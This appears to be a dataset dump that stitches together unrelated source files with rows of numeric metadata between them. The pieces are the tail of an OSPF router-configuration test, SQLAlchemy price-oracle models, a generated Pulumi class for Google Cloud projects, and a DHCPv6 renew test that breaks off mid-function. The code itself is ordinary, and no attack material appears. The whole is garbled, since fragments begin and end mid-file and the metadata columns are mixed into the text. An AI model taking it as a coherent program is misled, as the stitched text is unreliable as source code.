'auto-cost-ref-bandwidth': '4',
'bfd': 'enable',
'database-overflow': 'enable',
'database-overflow-max-lsas': '7',
'database-overflow-time-to-recover': '8',
'default-information-metric': '9',
'default-information-metric-type': '1',
'default-information-originate': 'enable',
'default-information-route-map': 'test_value_12',
'default-metric': '13',
'distance': '14',
'distance-external': '15',
'distance-inter-area': '16',
'distance-intra-area': '17',
'distribute-list-in': 'test_value_18',
'distribute-route-map-in': 'test_value_19',
'log-neighbour-changes': 'enable',
'restart-mode': 'none',
'restart-period': '22',
'rfc1583-compatible': 'enable',
'router-id': 'test_value_24',
'spf-timers': 'test_value_25',
}
set_method_mock.assert_called_with('router', 'ospf', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
| 37.827381
| 133
| 0.617624
| 1,401
| 12,710
| 5.307637
| 0.149893
| 0.048413
| 0.047337
| 0.030258
| 0.859064
| 0.846961
| 0.834185
| 0.834185
| 0.834185
| 0.834185
| 0
| 0.028778
| 0.239969
| 12,710
| 335
| 134
| 37.940299
| 0.740994
| 0.052242
| 0
| 0.877256
| 0
| 0
| 0.458188
| 0.210474
| 0
| 0
| 0
| 0
| 0.086643
| 1
| 0.018051
| false
| 0
| 0.028881
| 0
| 0.050542
| 0.00361
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f7961828e0c3e67b6b407fa3c58aaef9ade02bc9
| 1,142
|
py
|
Python
|
src/models/compound.py
|
Dragonfly-Capital/oracles.club.server
|
092dc1e6d205ceb475cd65f9b1c3e4aa6ef588dd
|
[
"MIT"
] | 7
|
2020-04-28T02:17:51.000Z
|
2020-09-23T17:39:38.000Z
|
src/models/compound.py
|
Dragonfly-Capital/oracles.club.server
|
092dc1e6d205ceb475cd65f9b1c3e4aa6ef588dd
|
[
"MIT"
] | 1
|
2020-08-10T19:39:12.000Z
|
2020-08-10T19:39:12.000Z
|
src/models/compound.py
|
Dragonfly-Capital/oracles.club.server
|
092dc1e6d205ceb475cd65f9b1c3e4aa6ef588dd
|
[
"MIT"
] | 2
|
2020-05-10T09:39:47.000Z
|
2020-07-27T18:12:23.000Z
|
from .create_db import db
class CompoundETH(db.Model):
__tablename__ = 'compound'
id = db.Column('id', db.Integer, primary_key=True)
blocknumber = db.Column('blocknumber', db.Integer)
timestamp = db.Column('timestamp', db.Integer)
price = db.Column('price', db.Float)
def __repr__(self):
return '{}, {}, {}'.format(self.blocknumber, self.timestamp, self.price)
class CompoundBTC(db.Model):
__tablename__ = 'compoundbtc'
id = db.Column('id', db.Integer, primary_key=True)
blocknumber = db.Column('blocknumber', db.Integer)
timestamp = db.Column('timestamp', db.Integer)
price = db.Column('price', db.Float)
def __repr__(self):
return '{}, {}, {}'.format(self.blocknumber, self.timestamp, self.price)
class CompoundBAT(db.Model):
__tablename__ = 'compoundbat'
id = db.Column('id', db.Integer, primary_key=True)
blocknumber = db.Column('blocknumber', db.Integer)
timestamp = db.Column('timestamp', db.Integer)
price = db.Column('price', db.Float)
def __repr__(self):
return '{}, {}, {}'.format(self.blocknumber, self.timestamp, self.price)
| 32.628571
| 80
| 0.661996
| 137
| 1,142
| 5.313869
| 0.189781
| 0.131868
| 0.065934
| 0.049451
| 0.813187
| 0.813187
| 0.813187
| 0.813187
| 0.813187
| 0.813187
| 0
| 0
| 0.174256
| 1,142
| 34
| 81
| 33.588235
| 0.772004
| 0
| 0
| 0.72
| 0
| 0
| 0.123468
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.12
| false
| 0
| 0.04
| 0.12
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
54003ebc336e679915dcaaaf5a9466d49a4251af
| 34,176
|
py
|
Python
|
sdk/python/pulumi_gcp/organizations/project.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_gcp/organizations/project.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_gcp/organizations/project.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ProjectArgs', 'Project']
@pulumi.input_type
class ProjectArgs:
def __init__(__self__, *,
project_id: pulumi.Input[str],
auto_create_network: Optional[pulumi.Input[bool]] = None,
billing_account: Optional[pulumi.Input[str]] = None,
folder_id: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
org_id: Optional[pulumi.Input[str]] = None,
skip_delete: Optional[pulumi.Input[bool]] = None):
"""
The set of arguments for constructing a Project resource.
:param pulumi.Input[str] project_id: The project ID. Changing this forces a new project to be created.
:param pulumi.Input[bool] auto_create_network: Create the 'default' network automatically. Default `true`.
If set to `false`, the default network will be deleted. Note that, for quota purposes, you
will still need to have 1 network slot available to create the project successfully, even if
you set `auto_create_network` to `false`, since the network will exist momentarily.
:param pulumi.Input[str] billing_account: The alphanumeric ID of the billing account this project
belongs to. The user or service account performing this operation with the provider
must have at mininum Billing Account User privileges (`roles/billing.user`) on the billing account.
See [Google Cloud Billing API Access Control](https://cloud.google.com/billing/docs/how-to/billing-access)
for more details.
:param pulumi.Input[str] folder_id: The numeric ID of the folder this project should be
created under. Only one of `org_id` or `folder_id` may be
specified. If the `folder_id` is specified, then the project is
created under the specified folder. Changing this forces the
project to be migrated to the newly specified folder.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: A set of key/value label pairs to assign to the project.
:param pulumi.Input[str] name: The display name of the project.
:param pulumi.Input[str] org_id: The numeric ID of the organization this project belongs to.
Changing this forces a new project to be created. Only one of
`org_id` or `folder_id` may be specified. If the `org_id` is
specified then the project is created at the top level. Changing
this forces the project to be migrated to the newly specified
organization.
:param pulumi.Input[bool] skip_delete: If true, the resource can be deleted
without deleting the Project via the Google API.
"""
pulumi.set(__self__, "project_id", project_id)
if auto_create_network is not None:
pulumi.set(__self__, "auto_create_network", auto_create_network)
if billing_account is not None:
pulumi.set(__self__, "billing_account", billing_account)
if folder_id is not None:
pulumi.set(__self__, "folder_id", folder_id)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if name is not None:
pulumi.set(__self__, "name", name)
if org_id is not None:
pulumi.set(__self__, "org_id", org_id)
if skip_delete is not None:
pulumi.set(__self__, "skip_delete", skip_delete)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Input[str]:
"""
The project ID. Changing this forces a new project to be created.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: pulumi.Input[str]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter(name="autoCreateNetwork")
def auto_create_network(self) -> Optional[pulumi.Input[bool]]:
"""
Create the 'default' network automatically. Default `true`.
If set to `false`, the default network will be deleted. Note that, for quota purposes, you
will still need to have 1 network slot available to create the project successfully, even if
you set `auto_create_network` to `false`, since the network will exist momentarily.
"""
return pulumi.get(self, "auto_create_network")
@auto_create_network.setter
def auto_create_network(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_create_network", value)
@property
@pulumi.getter(name="billingAccount")
def billing_account(self) -> Optional[pulumi.Input[str]]:
"""
The alphanumeric ID of the billing account this project
belongs to. The user or service account performing this operation with the provider
must have at mininum Billing Account User privileges (`roles/billing.user`) on the billing account.
See [Google Cloud Billing API Access Control](https://cloud.google.com/billing/docs/how-to/billing-access)
for more details.
"""
return pulumi.get(self, "billing_account")
@billing_account.setter
def billing_account(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "billing_account", value)
@property
@pulumi.getter(name="folderId")
def folder_id(self) -> Optional[pulumi.Input[str]]:
"""
The numeric ID of the folder this project should be
created under. Only one of `org_id` or `folder_id` may be
specified. If the `folder_id` is specified, then the project is
created under the specified folder. Changing this forces the
project to be migrated to the newly specified folder.
"""
return pulumi.get(self, "folder_id")
@folder_id.setter
def folder_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "folder_id", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A set of key/value label pairs to assign to the project.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The display name of the project.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="orgId")
def org_id(self) -> Optional[pulumi.Input[str]]:
"""
The numeric ID of the organization this project belongs to.
Changing this forces a new project to be created. Only one of
`org_id` or `folder_id` may be specified. If the `org_id` is
specified then the project is created at the top level. Changing
this forces the project to be migrated to the newly specified
organization.
"""
return pulumi.get(self, "org_id")
@org_id.setter
def org_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "org_id", value)
@property
@pulumi.getter(name="skipDelete")
def skip_delete(self) -> Optional[pulumi.Input[bool]]:
"""
If true, the resource can be deleted
without deleting the Project via the Google API.
"""
return pulumi.get(self, "skip_delete")
@skip_delete.setter
def skip_delete(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "skip_delete", value)
@pulumi.input_type
class _ProjectState:
def __init__(__self__, *,
auto_create_network: Optional[pulumi.Input[bool]] = None,
billing_account: Optional[pulumi.Input[str]] = None,
folder_id: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
number: Optional[pulumi.Input[str]] = None,
org_id: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
skip_delete: Optional[pulumi.Input[bool]] = None):
"""
Input properties used for looking up and filtering Project resources.
:param pulumi.Input[bool] auto_create_network: Create the 'default' network automatically. Default `true`.
If set to `false`, the default network will be deleted. Note that, for quota purposes, you
will still need to have 1 network slot available to create the project successfully, even if
you set `auto_create_network` to `false`, since the network will exist momentarily.
:param pulumi.Input[str] billing_account: The alphanumeric ID of the billing account this project
belongs to. The user or service account performing this operation with the provider
must have at mininum Billing Account User privileges (`roles/billing.user`) on the billing account.
See [Google Cloud Billing API Access Control](https://cloud.google.com/billing/docs/how-to/billing-access)
for more details.
:param pulumi.Input[str] folder_id: The numeric ID of the folder this project should be
created under. Only one of `org_id` or `folder_id` may be
specified. If the `folder_id` is specified, then the project is
created under the specified folder. Changing this forces the
project to be migrated to the newly specified folder.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: A set of key/value label pairs to assign to the project.
:param pulumi.Input[str] name: The display name of the project.
:param pulumi.Input[str] number: The numeric identifier of the project.
:param pulumi.Input[str] org_id: The numeric ID of the organization this project belongs to.
Changing this forces a new project to be created. Only one of
`org_id` or `folder_id` may be specified. If the `org_id` is
specified then the project is created at the top level. Changing
this forces the project to be migrated to the newly specified
organization.
:param pulumi.Input[str] project_id: The project ID. Changing this forces a new project to be created.
:param pulumi.Input[bool] skip_delete: If true, the resource can be deleted
without deleting the Project via the Google API.
"""
if auto_create_network is not None:
pulumi.set(__self__, "auto_create_network", auto_create_network)
if billing_account is not None:
pulumi.set(__self__, "billing_account", billing_account)
if folder_id is not None:
pulumi.set(__self__, "folder_id", folder_id)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if name is not None:
pulumi.set(__self__, "name", name)
if number is not None:
pulumi.set(__self__, "number", number)
if org_id is not None:
pulumi.set(__self__, "org_id", org_id)
if project_id is not None:
pulumi.set(__self__, "project_id", project_id)
if skip_delete is not None:
pulumi.set(__self__, "skip_delete", skip_delete)
@property
@pulumi.getter(name="autoCreateNetwork")
def auto_create_network(self) -> Optional[pulumi.Input[bool]]:
"""
Create the 'default' network automatically. Default `true`.
If set to `false`, the default network will be deleted. Note that, for quota purposes, you
will still need to have 1 network slot available to create the project successfully, even if
you set `auto_create_network` to `false`, since the network will exist momentarily.
"""
return pulumi.get(self, "auto_create_network")
@auto_create_network.setter
def auto_create_network(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_create_network", value)
@property
@pulumi.getter(name="billingAccount")
def billing_account(self) -> Optional[pulumi.Input[str]]:
"""
The alphanumeric ID of the billing account this project
belongs to. The user or service account performing this operation with the provider
must have at mininum Billing Account User privileges (`roles/billing.user`) on the billing account.
See [Google Cloud Billing API Access Control](https://cloud.google.com/billing/docs/how-to/billing-access)
for more details.
"""
return pulumi.get(self, "billing_account")
@billing_account.setter
def billing_account(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "billing_account", value)
@property
@pulumi.getter(name="folderId")
def folder_id(self) -> Optional[pulumi.Input[str]]:
"""
The numeric ID of the folder this project should be
created under. Only one of `org_id` or `folder_id` may be
specified. If the `folder_id` is specified, then the project is
created under the specified folder. Changing this forces the
project to be migrated to the newly specified folder.
"""
return pulumi.get(self, "folder_id")
@folder_id.setter
def folder_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "folder_id", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A set of key/value label pairs to assign to the project.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The display name of the project.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def number(self) -> Optional[pulumi.Input[str]]:
"""
The numeric identifier of the project.
"""
return pulumi.get(self, "number")
@number.setter
def number(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "number", value)
@property
@pulumi.getter(name="orgId")
def org_id(self) -> Optional[pulumi.Input[str]]:
"""
The numeric ID of the organization this project belongs to.
Changing this forces a new project to be created. Only one of
`org_id` or `folder_id` may be specified. If the `org_id` is
specified then the project is created at the top level. Changing
this forces the project to be migrated to the newly specified
organization.
"""
return pulumi.get(self, "org_id")
@org_id.setter
def org_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "org_id", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[pulumi.Input[str]]:
"""
The project ID. Changing this forces a new project to be created.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter(name="skipDelete")
def skip_delete(self) -> Optional[pulumi.Input[bool]]:
"""
If true, the resource can be deleted
without deleting the Project via the Google API.
"""
return pulumi.get(self, "skip_delete")
@skip_delete.setter
def skip_delete(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "skip_delete", value)
class Project(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
auto_create_network: Optional[pulumi.Input[bool]] = None,
billing_account: Optional[pulumi.Input[str]] = None,
folder_id: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
org_id: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
skip_delete: Optional[pulumi.Input[bool]] = None,
__props__=None):
"""
Allows creation and management of a Google Cloud Platform project.
Projects created with this resource must be associated with an Organization.
See the [Organization documentation](https://cloud.google.com/resource-manager/docs/quickstarts) for more details.
The user or service account that is running this provider when creating a `organizations.Project`
resource must have `roles/resourcemanager.projectCreator` on the specified organization. See the
[Access Control for Organizations Using IAM](https://cloud.google.com/resource-manager/docs/access-control-org)
doc for more information.
> This resource reads the specified billing account on every provider apply and plan operation so you must have permissions on the specified billing account.
To get more information about projects, see:
* [API documentation](https://cloud.google.com/resource-manager/reference/rest/v1/projects)
* How-to Guides
* [Creating and managing projects](https://cloud.google.com/resource-manager/docs/creating-managing-projects)
## Example Usage
```python
import pulumi
import pulumi_gcp as gcp
my_project = gcp.organizations.Project("myProject",
org_id="1234567",
project_id="your-project-id")
```
To create a project under a specific folder
```python
import pulumi
import pulumi_gcp as gcp
department1 = gcp.organizations.Folder("department1",
display_name="Department 1",
parent="organizations/1234567")
my_project_in_a_folder = gcp.organizations.Project("myProject-in-a-folder",
project_id="your-project-id",
folder_id=department1.name)
```
## Import
Projects can be imported using the `project_id`, e.g.
```sh
$ pulumi import gcp:organizations/project:Project my_project your-project-id
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] auto_create_network: Create the 'default' network automatically. Default `true`.
If set to `false`, the default network will be deleted. Note that, for quota purposes, you
will still need to have 1 network slot available to create the project successfully, even if
you set `auto_create_network` to `false`, since the network will exist momentarily.
:param pulumi.Input[str] billing_account: The alphanumeric ID of the billing account this project
belongs to. The user or service account performing this operation with the provider
must have at mininum Billing Account User privileges (`roles/billing.user`) on the billing account.
See [Google Cloud Billing API Access Control](https://cloud.google.com/billing/docs/how-to/billing-access)
for more details.
:param pulumi.Input[str] folder_id: The numeric ID of the folder this project should be
created under. Only one of `org_id` or `folder_id` may be
specified. If the `folder_id` is specified, then the project is
created under the specified folder. Changing this forces the
project to be migrated to the newly specified folder.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: A set of key/value label pairs to assign to the project.
:param pulumi.Input[str] name: The display name of the project.
:param pulumi.Input[str] org_id: The numeric ID of the organization this project belongs to.
Changing this forces a new project to be created. Only one of
`org_id` or `folder_id` may be specified. If the `org_id` is
specified then the project is created at the top level. Changing
this forces the project to be migrated to the newly specified
organization.
:param pulumi.Input[str] project_id: The project ID. Changing this forces a new project to be created.
:param pulumi.Input[bool] skip_delete: If true, the resource can be deleted
without deleting the Project via the Google API.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ProjectArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Allows creation and management of a Google Cloud Platform project.
Projects created with this resource must be associated with an Organization.
See the [Organization documentation](https://cloud.google.com/resource-manager/docs/quickstarts) for more details.
The user or service account that is running this provider when creating a `organizations.Project`
resource must have `roles/resourcemanager.projectCreator` on the specified organization. See the
[Access Control for Organizations Using IAM](https://cloud.google.com/resource-manager/docs/access-control-org)
doc for more information.
> This resource reads the specified billing account on every provider apply and plan operation so you must have permissions on the specified billing account.
To get more information about projects, see:
* [API documentation](https://cloud.google.com/resource-manager/reference/rest/v1/projects)
* How-to Guides
* [Creating and managing projects](https://cloud.google.com/resource-manager/docs/creating-managing-projects)
## Example Usage
```python
import pulumi
import pulumi_gcp as gcp
my_project = gcp.organizations.Project("myProject",
org_id="1234567",
project_id="your-project-id")
```
To create a project under a specific folder
```python
import pulumi
import pulumi_gcp as gcp
department1 = gcp.organizations.Folder("department1",
display_name="Department 1",
parent="organizations/1234567")
my_project_in_a_folder = gcp.organizations.Project("myProject-in-a-folder",
project_id="your-project-id",
folder_id=department1.name)
```
## Import
Projects can be imported using the `project_id`, e.g.
```sh
$ pulumi import gcp:organizations/project:Project my_project your-project-id
```
:param str resource_name: The name of the resource.
:param ProjectArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ProjectArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
auto_create_network: Optional[pulumi.Input[bool]] = None,
billing_account: Optional[pulumi.Input[str]] = None,
folder_id: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
org_id: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
skip_delete: Optional[pulumi.Input[bool]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ProjectArgs.__new__(ProjectArgs)
__props__.__dict__["auto_create_network"] = auto_create_network
__props__.__dict__["billing_account"] = billing_account
__props__.__dict__["folder_id"] = folder_id
__props__.__dict__["labels"] = labels
__props__.__dict__["name"] = name
__props__.__dict__["org_id"] = org_id
if project_id is None and not opts.urn:
raise TypeError("Missing required property 'project_id'")
__props__.__dict__["project_id"] = project_id
__props__.__dict__["skip_delete"] = skip_delete
__props__.__dict__["number"] = None
super(Project, __self__).__init__(
'gcp:organizations/project:Project',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
auto_create_network: Optional[pulumi.Input[bool]] = None,
billing_account: Optional[pulumi.Input[str]] = None,
folder_id: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
number: Optional[pulumi.Input[str]] = None,
org_id: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
skip_delete: Optional[pulumi.Input[bool]] = None) -> 'Project':
"""
Get an existing Project resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] auto_create_network: Create the 'default' network automatically. Default `true`.
If set to `false`, the default network will be deleted. Note that, for quota purposes, you
will still need to have 1 network slot available to create the project successfully, even if
you set `auto_create_network` to `false`, since the network will exist momentarily.
:param pulumi.Input[str] billing_account: The alphanumeric ID of the billing account this project
belongs to. The user or service account performing this operation with the provider
must have at mininum Billing Account User privileges (`roles/billing.user`) on the billing account.
See [Google Cloud Billing API Access Control](https://cloud.google.com/billing/docs/how-to/billing-access)
for more details.
:param pulumi.Input[str] folder_id: The numeric ID of the folder this project should be
created under. Only one of `org_id` or `folder_id` may be
specified. If the `folder_id` is specified, then the project is
created under the specified folder. Changing this forces the
project to be migrated to the newly specified folder.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: A set of key/value label pairs to assign to the project.
:param pulumi.Input[str] name: The display name of the project.
:param pulumi.Input[str] number: The numeric identifier of the project.
:param pulumi.Input[str] org_id: The numeric ID of the organization this project belongs to.
Changing this forces a new project to be created. Only one of
`org_id` or `folder_id` may be specified. If the `org_id` is
specified then the project is created at the top level. Changing
this forces the project to be migrated to the newly specified
organization.
:param pulumi.Input[str] project_id: The project ID. Changing this forces a new project to be created.
:param pulumi.Input[bool] skip_delete: If true, the resource can be deleted
without deleting the Project via the Google API.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ProjectState.__new__(_ProjectState)
__props__.__dict__["auto_create_network"] = auto_create_network
__props__.__dict__["billing_account"] = billing_account
__props__.__dict__["folder_id"] = folder_id
__props__.__dict__["labels"] = labels
__props__.__dict__["name"] = name
__props__.__dict__["number"] = number
__props__.__dict__["org_id"] = org_id
__props__.__dict__["project_id"] = project_id
__props__.__dict__["skip_delete"] = skip_delete
return Project(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="autoCreateNetwork")
def auto_create_network(self) -> pulumi.Output[Optional[bool]]:
"""
Create the 'default' network automatically. Default `true`.
If set to `false`, the default network will be deleted. Note that, for quota purposes, you
will still need to have 1 network slot available to create the project successfully, even if
you set `auto_create_network` to `false`, since the network will exist momentarily.
"""
return pulumi.get(self, "auto_create_network")
@property
@pulumi.getter(name="billingAccount")
def billing_account(self) -> pulumi.Output[Optional[str]]:
"""
The alphanumeric ID of the billing account this project
belongs to. The user or service account performing this operation with the provider
must have at mininum Billing Account User privileges (`roles/billing.user`) on the billing account.
See [Google Cloud Billing API Access Control](https://cloud.google.com/billing/docs/how-to/billing-access)
for more details.
"""
return pulumi.get(self, "billing_account")
@property
@pulumi.getter(name="folderId")
def folder_id(self) -> pulumi.Output[str]:
"""
The numeric ID of the folder this project should be
created under. Only one of `org_id` or `folder_id` may be
specified. If the `folder_id` is specified, then the project is
created under the specified folder. Changing this forces the
project to be migrated to the newly specified folder.
"""
return pulumi.get(self, "folder_id")
@property
@pulumi.getter
def labels(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A set of key/value label pairs to assign to the project.
"""
return pulumi.get(self, "labels")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The display name of the project.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def number(self) -> pulumi.Output[str]:
"""
The numeric identifier of the project.
"""
return pulumi.get(self, "number")
@property
@pulumi.getter(name="orgId")
def org_id(self) -> pulumi.Output[str]:
"""
The numeric ID of the organization this project belongs to.
Changing this forces a new project to be created. Only one of
`org_id` or `folder_id` may be specified. If the `org_id` is
specified then the project is created at the top level. Changing
this forces the project to be migrated to the newly specified
organization.
"""
return pulumi.get(self, "org_id")
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Output[str]:
"""
The project ID. Changing this forces a new project to be created.
"""
return pulumi.get(self, "project_id")
@property
@pulumi.getter(name="skipDelete")
def skip_delete(self) -> pulumi.Output[bool]:
"""
If true, the resource can be deleted
without deleting the Project via the Google API.
"""
return pulumi.get(self, "skip_delete")
| 47.26971
| 165
| 0.648613
| 4,353
| 34,176
| 4.94096
| 0.059269
| 0.064953
| 0.055979
| 0.047052
| 0.919658
| 0.912265
| 0.904687
| 0.899247
| 0.892505
| 0.880649
| 0
| 0.001827
| 0.263138
| 34,176
| 722
| 166
| 47.33518
| 0.852242
| 0.505091
| 0
| 0.788274
| 1
| 0
| 0.083537
| 0.002301
| 0
| 0
| 0
| 0
| 0
| 1
| 0.162866
| false
| 0.003257
| 0.016287
| 0
| 0.276873
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
586e89dedd96060bbe2d352f5099a33f3d610b9b
| 23,281
|
py
|
Python
|
tests/dhcpv6/process/test_v6_renew.py
|
shawnmullaney/forge
|
aaaef0a0645f73d24666aab6a400f3604e753aac
|
[
"0BSD"
] | null | null | null |
tests/dhcpv6/process/test_v6_renew.py
|
shawnmullaney/forge
|
aaaef0a0645f73d24666aab6a400f3604e753aac
|
[
"0BSD"
] | null | null | null |
tests/dhcpv6/process/test_v6_renew.py
|
shawnmullaney/forge
|
aaaef0a0645f73d24666aab6a400f3604e753aac
|
[
"0BSD"
] | null | null | null |
"""DHCPv6 Renew"""
# pylint: disable=invalid-name,line-too-long
import pytest
import srv_control
import srv_msg
import references
import misc
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.renew
def test_v6_message_renew_reply():
# Testing server ability to perform message exchange RENEW - REPLY
# Message details Client Server
# SOLICIT -->
# <-- ADVERTISE
# REQUEST -->
# <-- REPLY
# correct message RENEW -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# IA-NA with suboption IA-Address
#
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::5-3000::55')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_NA')
